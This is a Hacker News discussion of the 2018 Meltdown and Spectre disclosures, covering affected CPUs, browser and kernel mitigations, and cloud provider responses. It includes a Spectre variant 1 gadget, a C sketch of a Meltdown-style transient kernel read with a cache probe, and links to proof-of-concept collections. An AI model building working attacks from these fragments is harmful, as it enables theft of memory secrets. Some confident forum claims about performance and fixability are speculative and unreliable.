Just checked on Windows and it was on by default for me for Firefox 57.0.3


Doesn't each tab run in a separate process?


That's true to first approximation in Chrome, but apparently not always.

This recent article contains a bit more detail on Site Isolation: https://arstechnica.com/gadgets/2017/12/chrome-63-offers-eve...

> Chrome's default model is, approximately, to use one process per tab. This more or less ensures that unrelated sites are kept in separate processes, but there are nuances to this set-up. Pages share a process if they are related through, for example, one opening another with JavaScript or iframes embedding (wherein one page is included as content within another page). Over the course of a single browsing session, one tab may be used to visit multiple different domains; they'll all potentially be opened within a single process. On top of this, if there are already too many Chrome processes running, Chrome will start opening new pages within existing processes, resulting in even unrelated pages sharing a process.

Which suggests there are a number of cases where multiple tabs could share a process.


Note that it's not just tabs sharing processes that's an issue: prior to the site isolation work, any iframe in the same page would always be in the same process as the main frame. With site isolation, it's possible to host cross-site [1] iframes in a separate process.

[1] Two pages are considered cross-site if they cannot use document.domain to become same origin. In practice, this means that the effective TLD + 1 component match.


Chrome starts putting multiple tabs in the same process once certain resource thresholds are reached. There's an experimental "site isolation" option that you can toggle on to enforce this better, currently with some caveats: https://www.chromium.org/Home/chromium-security/site-isolati... .

Curious to know whether Firefox has anything similar in the pipe, since it uses a fixed number of content processes rather than a variable number of processes.



This is so incredibly bad. Spectre is basically unpatchable. We can do better than we are now with patches but it's all just turd polishing, essentially. A proper fix will require new CPU hardware. And as a kicker? Leaks are basically undetectable.


New CPU microcode is enough, though at a performance price. On pre-Zen AMD there is also a chicken bit to disable indirect branch prediction. (It feels good to be finally able to speak about this freely!!!)

I don't know for which processors Intel and AMD plan to release microcode updates.


> New CPU microcode is enough

What would that entail? Disabling speculation completely? Disabling memory accesses during speculation?


Disabling indirect branch prediction (and thus speculation after indirect branches) while in kernel mode, or flushing the indirect branch predictor on kernel mode entry. Both need OS support in addition to the microcode, but the change is less invasive than PTI.


That only fixes one variant of Spectre, and only for code running in kernel mode.

The "out of bounds" Spectre variant is still feasible.

Also: What about hyperthreads? It seems to be many people's assumption that the BTB is shared within a physical core.


The out-of-bounds variant is fixable in the OS: just add a fence instruction between the check and the load.

For code running in user mode, you flush the branch predictor on each context switch---again, new microcode + patched OS.

Hyperthreads are tricky. Those are not yet fixed by microcode AIUI, and in the future you may want a usermode program to say "I don't want indirect branch prediction because I am afraid of what the other hyperthread might do to me". That would require some new system call (like a new prctl on Linux) or something like that.


Great. Now we just have to think of new attacks using the same general idea to slow down all computers by yet another 10% :p


Wouldn't that be a serious performance hit?


It is. Same ballpark as PTI on microbenchmarks, but a little better on macrobenchmarks.


Getting flashbacks of brainsmoke's JS PoC: https://youtu.be/ewe3-mUku94?t=1766

Edit: Also, PoCs for unpatched Windows by pwnallthethings: https://github.com/turbo/KPTI-PoC-Collection


I do also wonder if some speculative prediction / branching stuff can be controlled through undocumented CPU instructions: https://www.youtube.com/watch?v=KrksBdWcZgQ



"As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs"

I am not sure what "the process in which it runs" means here... do they mean private memory from within Chrome? Or within the child process spawned from Chrome, or within the spawned JS sandbox, or... what?

Practically speaking, I worry about a browser pageview that can read memory from my terminal process. Or from my 'screen' or 'sshd' process.

I think that is not a risk here, yes?


Will it be nontrivial to detect or at least identify these types of exploits as they occur in the wild? Can protection software see these when they happen, assuming a best case scenario where the attack is carried out but doesn't specifically use these methods to hide or disable detection? Is there a general sense yet of whether this exploit is already being leveraged?


Thanks for the links. As an undergrad with limited knowledge of this subject, I would love to see these annotated on Fermat's Library (https://fermatslibrary.com)


Guys, can't we just detect a program doing Spectre-like behavior and kill it, instead of having every other application suffer a performance hit from the proposed changes? Antivirus software already does similar stuff.


"AMD chips are affected by some but not all of the vulnerabilities. AMD said that there is a "near zero risk to AMD processors at this time." British chipmaker ARM told news site Axios prior to this report that some of its processors, including its Cortex-A chips, are affected."

- http://www.zdnet.com/article/security-flaws-affect-every-int...

* Edit:

From https://meltdownattack.com/

Which systems are affected by Meltdown?

"Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013). We successfully tested Meltdown on Intel processor generations released as early as 2011. Currently, we have only verified Meltdown on Intel processors. At the moment, it is unclear whether ARM and AMD processors are also affected by Meltdown.

Which systems are affected by Spectre?

Almost every system is affected by Spectre: Desktops, Laptops, Cloud Servers, as well as Smartphones. More specifically, all modern processors capable of keeping many instructions in flight are potentially vulnerable. In particular, we have verified Spectre on Intel, AMD, and ARM processors."


Looks like everyone is vulnerable to arbitrary user memory reads, while Intel and ARM are vulnerable to arbitrary kernel memory reads as well.


Thanks for clarifying Mike, should be interesting to see how this actually pans out.


Not just user memory reads. AMD CPUs won’t speculate loads from userland code directly to kernel memory, ignoring privilege checks (“Meltdown”). But they are still subject to the “Spectre” attack, which can disclose kernel memory by taking advantage of certain code patterns (which normally would be harmless) in kernel code.


But that means the root user, or someone with effective root privs or CAP_*, has to load programs into a kernel interpreter or kernel JIT. If you've given someone permission to do this from a user process, you've probably opened up to more mundane issues. I suspect this is why AMD says the risk is near zero; if you've given away the keys to the kernel, you're already in trouble.

AMD's ASID blocks the issues for VM guests (and root users on VM guests).


For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

For variant 2, Project Zero used the eBPF interpreter as a gadget, a fake branch destination, without having to actually create an eBPF program or use the normal userland-facing eBPF APIs at all. And they only chose it as the least "annoying" option (see quote below).

edit: I'm not sure how ASID support would mitigate either of those variants, though there may be something I'm not thinking of. (It would help with variant 3, but that's the variant AMD wasn't vulnerable to in the first place.)

quote:

> At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.


To make it a bit clearer how this works: the Variant 2 exploit poisons the branch target buffer to cause the processor's speculative execution in kernel space to jump to an entirely attacker-controlled destination when it hits a branch that matches the information the attacker has placed into the BTB. The actual retired instructions don't go this way of course - the processor detects the misprediction and goes back to execute the real code path - but the speculatively executed path still leaves evidence behind in the caches.


But somehow you have to get that kernel address in the first place in order to alias it in the BTB. How do you get that without root?


They test how a series of branches are predicted after returning from a hypercall, which lets them basically dump out the state of the BTB. From that, and knowledge of where the branches are in the hypervisor binary (the binaries themselves aren't really a secret, only the relocated load address is) they can figure out the load address of the hypervisor.

See the section "Reading host memory from a KVM guest / Locating the host kernel". It's terribly clever.


But if you use AMD ASID it blocks this as memory mappings for VM guests are in a completely separate address space.

What I was wondering was for local OS user mode to local OS root / kernel mode access; i.e. user to kernel privilege escalation.


It isn't obvious at all how a separate address space would block that method.

What would block it is flushing the branch predictor state when switching privilege levels and/or address spaces.


I've tried reading it and I still find all of this very confusing. Could you ELI5?


You boot up your own copy of Ubuntu LTS-whatever and read the address of it as root.

KASLR is not enabled everywhere, and where it is, there are other attacks to defeat it, which are mentioned in the paper.


I'm not sure I see how to use the Spectre attack on AMD without running in kernel context. What am I missing?


I should clarify I mean user to root privilege escalation.

I totally understand how the breaking-out-of-the-javascript-sandbox attack works, and the fact that PTI won't help with that. With Linux's clone(), you could clone without CLONE_VM and use CLONE_NEWUSER|CLONE_SYSVSEM, then unmap everything except the Javascript interpreter / JIT, leave a shared memory map, and communicate only via the shared memory map and SYSV semaphores for synchronisation. Obviously this wouldn't be available on other platforms.


By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

For variant 1, you would need to find some legitimate kernel code, accessible by syscall, that looks at least somewhat similar to the example in the Project Zero blog post:

    if (untrusted_offset_from_caller < arr1->length) {
        unsigned char value = arr1->data[untrusted_offset_from_caller];
        unsigned long index2 = ((value&1)*0x100)+0x200;
        if (index2 < arr2->length) {
            unsigned char value2 = arr2->data[index2];
        }
    }
In practice, you may not be able to find something nice like "((value&1)*0x100)+0x200", but even if it simply used 'value' as an index, you would be able to at least narrow it down to a range. Other code patterns may work too (and potentially be more powerful?), e.g. conditional branches based on 'value'.

For variant 2, see caf's answer to you in another thread.


>>> By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

The attack allows reading all the memory. Isn't there a way to scan for passwords or ssh keys and turn that into a privilege escalation?


Sure, SSH keys would probably work on a system with SSH enabled; I just wouldn't count that as "directly". (That would include most servers but exclude most Android devices; I have no idea whether there are other escalation methods for Android.)


Direct or indirect is meaningless at this point. The exploit is proven, they just have to determine the "best" memory locations to read to make something "useful" out of it. Then it's bundled together as an exploit kit and it's Armageddon.


> For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

If I'm understanding the post correctly it says that JIT's not required for Intel CPUs, but is required for AMD.


Their particular exploit for variant 1, which uses eBPF, only worked on AMD with the eBPF JIT, i.e. it did not work with the eBPF interpreter. But there are many other potential avenues to exploit that variant which have nothing to do with BPF. The result does suggest that it may generally be harder to trigger variant 1 on AMD processors (because they don't speculate as much?), but harder ≠ impossible.


Ah ok, thanks for clarifying.


Do you need root or comparable privileges to take advantage of BPF? I did not think that was the case. My understanding was that BPF code executes within the kernel.

BPF is employed by the `bpf()` syscall for socket packet filtering, as well as by `seccomp` itself for its syscall filtering. Is this threat vector not available to untrusted processes?


iirc I think that the BPF JIT is disabled by default? Your kernel might be compiled with `CONFIG_BPF_JIT`, but I think the sysctl knob (`bpf_jit_enable`) is set to 0 by default. Also there's a sysctl for unprivileged BPF called `unprivileged_bpf_disabled`. On my system it seems to default to 0.

https://elixir.free-electrons.com/linux/v4.15-rc6/source/ker...
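
If you want to check the box you're sitting on, those two knobs are visible under /proc/sys; a trivial reader (the paths are the standard sysctl locations for net.core.bpf_jit_enable and kernel.unprivileged_bpf_disabled):

    #include <stdio.h>

    static void show(const char *path) {
        char buf[32];
        FILE *f = fopen(path, "r");
        if (f && fgets(buf, sizeof buf, f))
            printf("%s = %s", path, buf); /* value includes its newline */
        else
            printf("%s: not available\n", path);
        if (f)
            fclose(f);
    }

    int main(void) {
        show("/proc/sys/net/core/bpf_jit_enable");
        show("/proc/sys/kernel/unprivileged_bpf_disabled");
        return 0;
    }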


That article links a commit [1] that contradicts this statement

> AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

And Axios [2] that Zdnet quotes gave a comment from AMD:

> "To be clear, the security research team identified three variants targeting speculative execution. The threat and the response to the three variants differ by microprocessor company, and AMD is not susceptible to all three variants. Due to differences in AMD's architecture, we believe there is a near zero risk to AMD processors at this time. We expect the security research to be published later today and will provide further updates at that time."

And a comment from ARM:

> Please note that our Cortex-M processors, which are pervasive in low-power, connected IoT devices, are not impacted.

[1] https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/...

[2] https://www.axios.com/how-the-giants-of-tech-are-dealing-wit...


My read is that vulnerable processors generally have to:

1. Have out of order execution

2. Have aggressive speculative memory load / caching behavior

3. Be able to speculatively cache memory not owned by the current process (either kernel or otherwise)

4. Have deterministic ways of triggering a speculative load / read to the same memory location

2 is probably the saving grace in ARM / low power land, given they don't have the power budget to trade speculative loads for performance (in the event they're even out of order in the first place).

Caveat: I'm drinking pretty strong Belgian beer while reading through these papers.


How does that pertain to the vulnerabilities that involve eBPF? My understanding is that eBPF code executes within the kernel, and so would run at the same privilege level.


"Intel suffers a Meltdown" should be an apt headline for tomorrow's headlines.


Another good article: https://www.theregister.co.uk/2018/01/02/intel_cpu_design_fl...

"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."


Google's post is newer and has more insights; the Register article is now outdated.


The Register has more details. Worth a read.


the google site has the actual white papers detailing the attacks.


The Register has the tweet with actual code for Spectre, and more details from the manufacturers and potential fixes. Seriously, they're both worth a read.


I think the point is that your quoted section of the reg article is not correct according to the new information from Google.


@lern_too_spel

The AMD engineer could be right if talking about Ryzen, and/or he isn't mentioning user-user and user-kernel boundaries.

AMD isn't affected in nearly the same way as Intel/ARM are: https://twitter.com/ryanshrout/status/948683677244018689


Yeah that's a good one, hope they keep it updated / link to new info / posts as they come out.


Hard to find a good spot for this, but: Thanks to anyone involved! From grasping the magnitude of this vulnerability to coordinating it with all major OS vendors, including Open Source ones that do all of their stuff more or less "in the open", it was almost a miracle that the flaw was leaked "only" a few days before the embargo - and we'll all have patches to protect our infrastructure just in time.

Interestingly, it also put the LKML developers into an ethical grey zone, as they had to deceive the public into believing the patch was fixing something else (they did the good and right thing there IMHO).

Despite all the slight problems along the way, kudos to all of the White Hats dealing with this mess over the last months and handling it super gracefully!


Consider how many other of such "gray" patches could already be in the kernel ;)


I'm not that savvy with security so I need a little help understanding this. According to the google security blog:

> Google Chrome

> Some user or customer action needed. More information here (https://support.google.com/faqs/answer/7622138#chrome).

And the "here" link says:

>Google Chrome Browser

>Current stable versions of Chrome include an optional feature called Site Isolation which can be enabled to provide mitigation by isolating websites into separate address spaces. Learn more about Site Isolation and how to take action to enable it.

>Chrome 64, due to be released on January 23, will contain mitigations to protect against exploitation.

>Additional mitigations are planned for future versions of Chrome. Learn more about Chrome's response.

>Desktop (all platforms), Chrome 63:

> Full Site Isolation can be turned on by enabling a flag found at chrome://flags/#enable-site-per-process. > Enterprise policies are available to turn on Site Isolation for all sites, or just those in a specified list. Learn more about Site Isolation by policy.

Does that mean if I don't enable this feature using chrome://flags and tell my grandma to do this complicated procedure I (or she) will be susceptible to getting our passwords stolen?


It probably means if you want mitigations right now, you can flip that flag. Otherwise wait for Chrome to auto-update with new versions that have mitigations enabled by default.


Would I be correct in assuming a browser-level mitigation isn't necessary if you're running a patched OS?


The OS patch stops you reading kernel space from user space trivially (i.e. without eBPF, as in the Project Zero example). You can still cause leakage from the same context: for example, the V8 JIT can read all of the process's memory, and without site isolation that can include data from other web pages, passwords, cookies, etc.


Your OS needs patching, as do any programs which handle secret stuff like passwords, cookies, or tokens and interact with the internet (i.e. web browsers).


Wasn't there a PoC for a second issue of js reading memory from its own process? Could potentially be an issue (eg reading data from another website)


no


From a recently posted patch set:

Subject: Avoid speculative indirect calls in kernel

Any speculative indirect calls in the kernel can be tricked to execute any kernel code, which may allow side channel attacks that can leak arbitrary kernel data.

So we want to avoid speculative indirect calls in the kernel.

There's a special code sequence called a retpoline that can do indirect calls without speculation. We use a new compiler option -mindirect-branch=thunk-extern (gcc patch will be released separately) to recompile the kernel with this new sequence.

We also patch all the assembler code in the kernel to use the new sequence.
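
For the curious, the thunk the patch series builds looks roughly like this (AT&T syntax; labels are illustrative, not taken from the patch). Instead of `jmp *%rax`, the kernel calls a little stub that traps any speculation in a harmless loop while the real target is forced through the return path:

  call .Lset_up_target      # pushes the address of the landing pad
  .Lcapture_spec:
  pause                     # speculation that follows the return-stack
  jmp .Lcapture_spec        #   prediction spins here, side-effect free
  .Lset_up_target:
  mov %rax, (%rsp)          # overwrite the return address with the
  ret                       #   real target, then "return" to it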


Link?


Text and patch start here: https://lkml.org/lkml/2018/1/3/780

Also, see Linus' response here: https://lkml.org/lkml/2018/1/3/797


Ahh Linus, never change.



"Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at"

Does anyone have any color/details on how this came to be? A major fundamental flaw exists that affects all chips from the last ~10 years, and multiple independent groups discovered it roughly around the same time this past summer?

My hunch is that someone published some sort of speculative paper / gave a talk ("this flaw could exist in theory") and then everyone was off to the races.

But would be curious if anyone knows the real version?



Jann Horn's results & report pre-date the blog post though. The topic was "ripe", so to speak, so multiple parties investigated it at roughly the same time.


Yeah, the blog post says they knew since June 2017, with that blog post being from July.

> This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh's work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-....


AIUI, Anders Fogh has collaborated with people at TU Graz on various occasions previously: I'd assume they already knew about his work prior to the blog post.


There was a paper, "A Javascript Side-Channel Attack on LLC", in 2015 which seems similar to me; maybe it drove some research toward timing/caching mechanisms at the CPU level and their exploitation via a side channel attack.


Considering it affects most CPUs from the last decade (or even last two), shouldn't they have delayed it a little bit longer so that not only cloud businesses but also more mainstream companies get the time to deploy patches and tests?


Azure's response: https://azure.microsoft.com/en-us/blog/securing-azure-custom...

This part is interesting considering the performance concerns:

"The majority of Azure customers should not see a noticeable performance impact with this update. We’ve worked to optimize the CPU and disk I/O path and are not seeing noticeable performance impact after the fix has been applied. A small set of customers may experience some networking performance impact. This can be addressed by turning on Azure Accelerated Networking (Windows, Linux), which is a free capability available to all Azure customers."


Disclosure: I work on Google Cloud.

If you run a multitenant workload on a Linux system (say you're a PaaS, or even just hosting a bunch of WordPress sites side by side) you should update your kernel as soon as is reasonable. While VM to VM attacks are patched, I'm sure lots of folks are running untrusted code side by side and need to self-patch. This is why our docs point this out for, say, GKE: we can't be sure you're running single tenant, so we're not promising you there's no work to do. Update your OSes, people!


No offence intended as I'm sure it's a bit of a madhouse there right now, but is your statement really correct? I read the Spectre paper quite carefully and it appears to be unpatchable. Although the Meltdown paper is the one that conclusively demonstrated user->kernel and vm->vm reads with a PoC, and Spectre "only" demonstrated user->user reads, the Spectre paper clearly shows that any read type should be possible as long as the right sort of gadgets can be found. There seems no particular reason why cross-VM reads shouldn't be possible using the Spectre techniques and the paper says as much here:

For example, if a processor prevents speculative execution of instructions in user processes from accessing kernel memory, the attack will still work.

and

Kernel mode testing has not been performed, but the combination of address truncation/hashing in the history matching and trainability via jumps to illegal destinations suggest that attacks against kernel mode may be possible. The effect on other kinds of jumps, such as interrupts and interrupt returns, is also unknown

There doesn't seem to be any reason to believe VM to VM attacks are either patched or patchable.

My question to you, which I realise you may be unable to answer - how much does truly dedicated hardware on GCE cost? No co-tenants at all except maybe Google controlled code. Do you even offer it at all? I wasn't able to find much discussion based on a 10 second search.


Sorry for the confusion.

I have been most focused on people being concerned that a neighboring VM could suddenly be an attacker. You're right that the same kind of thing that affects your JavaScript engine as a user affects say Apache or anything that allows requests from external sources. However, that situation already has a much larger attack surface and people in that space should be updating themselves whenever there's any CVE like this.

My concern was that the Azure announcement made it sound like they've done the work, so nothing is required. That's not strictly true: even though providers have mitigated one set of attacks at the host kernel layer, guests still have work to do, so I wanted to correct that.


I'm not sure about GCE, but in Azure often the largest node size in a particular family (e.g. D15_v2, G5, M128, etc.) is isolated / dedicated to a single customer.


Interesting that they left it this late.


Disclosure: I work on Google Cloud.

Like the AWS reboots, people will notice. So in the interest of the embargo, both Azure and AWS waited to update as late as they felt was safe. Since we do live migrations and host kernel updates all the time, nobody noticed us :).


Someone correct me if I understood this wrong. The way they are exploiting speculative execution is to load values from memory regions they don't have permission to access into a cache line, and when the speculation is found to be false, the processor does not undo the write to the cache line?

The question is, how is the speculative write going to the cache in the first place? Only retired instructions should be able to modify cache lines AFAIK. What am I missing?

Edit: Figured it out. The speculatively accessed memory value is used to compute the address of a load from a memory location which the attacker does have access to. Once the mis-speculation is detected, the attacker times accesses to the memory which was speculatively loaded and figures out what the secret value was. Brilliant!
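
A hedged sketch of that gadget in C (names and sizes are illustrative, not taken from the PoC):

  #include <stdint.h>

  #define PAGE 4096
  uint8_t probe[256 * PAGE];   /* attacker-owned; flushed from cache first */

  void transient_leak(const uint8_t *kernel_addr) {
      /* This load faults on permissions, but on affected CPUs it still
         executes speculatively and forwards its value onward... */
      uint8_t value = *kernel_addr;
      /* ...so exactly one probe page gets pulled into the cache, indexed
         by the secret byte. The fault rollback does not undo that. */
      *(volatile uint8_t *)&probe[value * PAGE];
  }

Timing which of the 256 pages is now "fast" recovers the byte.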


Important to note that at this point they're only reading one bit at a time from kernel memory, but it could probably be changed to read more--exactly how many branches it could compare before the mis-speculation is detected is not discussed, and that could be an area for large speedups in the attack.


Wow, what a find for the Project Zero team. This team and idea can only be described as a success, well done.


"These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running them."

Curious. All other reports I've read state that AMD CPUs are not vulnerable.


See the Twitter thread here: https://twitter.com/nicoleperlroth/status/948678006859591682

(Edit: there are 9 posts total, go to her user page to see them all)

Seems there are two issues. One, called Meltdown, only affects Intel and is REALLY bad, but the kernel page table changes everyone is making fix it.

The other, dubbed Spectre, is apparently common to the way all processors handle speculative execution and is unfixable without new hardware.

I’d like to know more about that but I haven’t seen anything yet.

Whoever discovered this stuff on Google’s team deserves some sort of computer security Nobel prize.


That's not even close to a thread...

You can see all the tweets here (courtesy of @svenluijten): https://twitter.com/i/moments/948681915485351938.


After reading that thread, I sort of wonder if this is the catalyst for the next tech bust. Prices on the basic building block of the modern tech industry (a server shard) going up 30%, or even more as shared/virtual services must be decommissioned for isolation? Surely it's an alarmist thing to think and I don't think it's likely, but if you had asked me yesterday the likelihood of an underlying security vulnerability affecting every processor since 1995, I'd have said probably not.

Major props to the teams working on this... now time for us all to hold onto our pants as we ask for budget increases that will make shareholders demand blood.


Would be interesting to look at public companies where server costs going up 20% would kill their profit margins.


I don't think this is likely anywhere.

The only sorts of companies where server costs could increase hugely due to a sudden need for hardware isolation are those where they're running tiny or incredibly bursty workloads. Big companies like Netflix that use tons of cores can just binpack their work all together on the same hardware so their jobs only share hardware with other jobs controlled by the same company. Effectively, cloud providers will start offering sub-clouds into which only your own jobs will be scheduled.

This is actually how cloud tech has worked for many years internally. I worked at Google for a long time and their cluster control system (Borg) had a concept called "allocs" which were basically scheduling sub-domains. You could schedule an alloc to reserve some resources, and then schedule jobs into the alloc which would share those resources. Allocs were often used to avoid performance-related interference from shared jobs, e.g. when a batch job kept hogging the CPU caches and slowing down latency sensitive servers. I suppose these days VMs and containers do a similar job, though I think the Borg approach was nicer and more efficient.

I guess this sort of per-firm isolation will become common and most companies' costs won't change a huge amount. The people it'll hit will be small mom-and-pop personal servers, but they're unlikely to care about side channel attacks anyway. So I wouldn't sell stock in cloud providers just yet.


The linked thread suggests that Spectre doesn't have _any_ mitigation.

> The business/economic implications are not clear, since eventually the only way to eradicate the threat posed by Spectre is to swap out hardware.

Is this fully accurate? Is there really no software mitigation available now?

From [0], the above may be true:

> There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre.

There is 'work'? No current patch? So Spectre is unpatched?

This point doesn't seem to be being highlighted but appears particularly important.

[0] https://meltdownattack.com/#faq-fix


Yes, from my understanding, Spectre is an architectural-level flaw in the so-called speculative execution unit. In other words, Spectre will only be fixed once Intel, AMD, and ARM redesign the unit and release new processors. Given the timelines of CPU design, this will take 5-10 years at least.

On the positive side, the flaw is very difficult to exploit in a practical setting.


> On the positive side, the flaw is very difficult to exploit in a practical setting.

Is it?

"As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs"


So is this fixable or not?



There are possible mitigations for cloud customers: 1) pay $x / hour and run on a shared machine with the possibility of an attack; 2) pay $y / hour (where x < y) and run all your processes on dedicated machines without anybody else.

Moreover, option 2 already exists for large customers and security-sensitive applications (e.g. the CIA's dedicated cloud built by Amazon).


Amazon instances can be created with the dedicated flag. The host hardware will be dedicated to you, not shared with any other users. It should mitigate the attack.

The flag has a fixed fee in the thousands of dollars and each instance is 10% more expensive.


I didn’t find out there were more than 4 posts until after I made my comment (thus the edit).

Thanks for the handy link.


I can't really see how it would be fixable even with new hardware.

Speculative execution is fundamental to getting decent performance out of a CPU. Without it you should probably divide your performance expectations by 5 at least.

Rolling back all state rather than just user-visible state in the CPU is nigh on impossible. When you evict something from the cache, you delete it. Undeleting is hard. There are also a lot of other non-user-visible bits of state in a CPU.


I agree that we'll probably see new attacks in this area for a long time.

That said, the main new ingredient of Spectre seems to be the idea that userspace can poison the branch target buffer to cause speculative execution of arbitrary code in kernel space. That part of the attack should be fairly easy to mitigate with new hardware, by XORing (or hashing) the index into the BTB with a configurable value that depends on the privilege level. So each process has its own "nonce", and they're all different from the kernel's.

Then BTB poisoning won't work unless the attacker knows its own and the other context's nonce. Even if further attacks are found that leak this nonce, they could be mitigated by changing the nonce at regular intervals.
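
A rough model of that proposal (everything here is hypothetical; real BTB indexing functions are undocumented):

  #include <stdint.h>

  #define BTB_ENTRIES 4096u          /* hypothetical size, power of two */

  /* One nonce per context (process or kernel), re-randomized at intervals. */
  static uint32_t context_nonce;

  static uint32_t btb_index(uint64_t branch_pc) {
      /* Mixing the nonce into the index means an attacker can no longer
         craft branch addresses that alias with another context's entries. */
      return ((uint32_t)(branch_pc >> 2) ^ context_nonce) & (BTB_ENTRIES - 1);
  }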


Couldn't you do something like have a separate chunk of "speculative cache" which you only commit to the main cache once the speculatively-executed instructions are retired? Sounds complex, sure - but it seems like that would give you the performance benefits of speculative execution while still being able to roll back (or prevent in the first place) any cache-state side effects when branches were mispredicted. Could also imagine processors start segregating cache by privilege level.

I guess part of the question you're raising is: are there so many different caches, translation buffers, etc. in a modern CPU that keeping 'uncommitted buffers' for the state of all of them would be just as complex as throwing a whole other core in there?


No, that would not be enough. CPUs speculatively execute across multiple branches. Even if you had a separate speculative cache for every code path, you could still build a side-channel from the amount of contention. [1]

[1] https://eprint.iacr.org/2016/613.pdf

> Both hardware thread systems (SMT and TMT) expose contention within the execution core. In SMT, the threads effectively compete in real time for access to functional units, the L1 cache, and speculation resources (such as the BTB). This is similar to the real-time sharing that occurs between separate cores, but includes all levels of the architecture. [...] SMT has been exploited in known attacks (Sections 4.2.1 and 4.3.1)


Possibly - but that's an entirely new processor design. That would take years to get released and adopted.

The scary thing is that you can't fix this in software.


It effectively means wiping the caches, TLBs, BTBs and any other caches and optimisations on any form of context switch, as far as I can see? Which yes will likely require new silicon.


> computer security Nobel prize

While they're not as big of a deal AFAIK, we do have the Pwnie Awards: https://pwnies.com/


We should have an annual vulnerability/amelioration award (the Cerberus?) and give one to those guys.


You can find the details below. They've tried AMD CPUs also.

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


"We reported this issue to Intel, AMD and ARM on 2017-06-01"

What!


You know it's a bad one when Project Zero allows more than its usual 90-day deadline...


"Which systems are affected?" – "All systems." – "Come again?"


From the FAQ on spectreattack.com:

> Q: Am I affected by the bug?

> A: Most certainly, yes.

Scary.


If you're using an in-order processor, a Nexus 9 tablet say, then you should be safe.


I wasn't thinking straight last night. Basically all in-order application processors use speculative execution as well.


Even a low-power core like a Cortex-M7 can do some speculative execution through its branch predictor.

Though of course an M7 isn't running VMs, and probably isn't running any kind of attacker-controlled code (scripting included - it's there, but rare), so many of the vectors aren't present.


Then they front-run the negotiated timeline anyway, catching projects like Xen off guard, it seems [0]. I'll be interested to read the postmortem of the entire process from start to finish, and Xen is promising one from their perspective. I'd be especially interested to understand whether public intel was concrete enough to justify rushing this out the door, because it didn't seem like it was, but I probably missed something.

[0]: https://xenbits.xen.org/xsa/advisory-254.html


I reimplemented variant 3 based solely on clues from twitter posts yesterday.

I am by no means a computer security guru - I just did a CPU architecture course at uni and figured I'd cowboy up an implementation. It worked nearly first time, and can read both kernel and userspace pages from userspace by fooling the branch predictor into going down the wrong path, and relying on the permission checks to be slower than the data reads from a virtually addressed cache. It can only access stuff already cached though, so you can't do a full memory dump with it.


Speculation was apparently hitting very close to home, allowing attackers with resources (think nation states) to start developing their own tooling. At least this early announcement allows people with sensitive data to quickly move to dedicated instances.

edit: well, it didn't take a nation state after all: https://twitter.com/brainsmoke/status/948561799875502080 - given that, you can be sure that everybody who counts is frantically launching these on your clouds, gathering whatever they can.


How far in advance do Intel managers have to register a stock sale?


The CEO dropped his stock holdings down to the minimum allowed by their board bylaws in December.

https://www.fool.com/investing/2017/12/19/intels-ceo-just-so...


For his sake, I hope longer than 6 months!


You mean without getting whomped for insider trading? I don't think they're allowed to do it in advance at all.


As far as I know they HAVE to register a trade in advance, e.g. three months ahead: "I will sell 600 shares on the 15th of December if the share price is above 50". This information is public and other people can use it before the trade actually happens.


Note that's not a legal requirement. That's just a policy many companies have to lower the risk of insider trading.


It looks like he registered for the trade in October, well after Intel was made aware of the issue.


We won't know until we have the full details. From the Linux patches it looked like AMD x86-64 processors were not affected.

But the sentence you quote adds AMD back into play. Maybe some of its ARM processors? e.g. the AMD Opteron A1100?


They weren't affected by the really bad Intel-only bug named Meltdown. They're still susceptible to Spectre.


And yet it also says that AMD devices running Android are not vulnerable.

I'd be curious how those two statements should be reconciled.


Not exactly; it says "we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices."


Links to descriptions of similar vulnerabilities in AMD and ARM processors would be very welcome.


Here's a list of what google tested:

Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)

AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)

AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)

An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


So there's a bit of an unknown as to whether AMD's most recent generation of processors has the Spectre vulnerability?


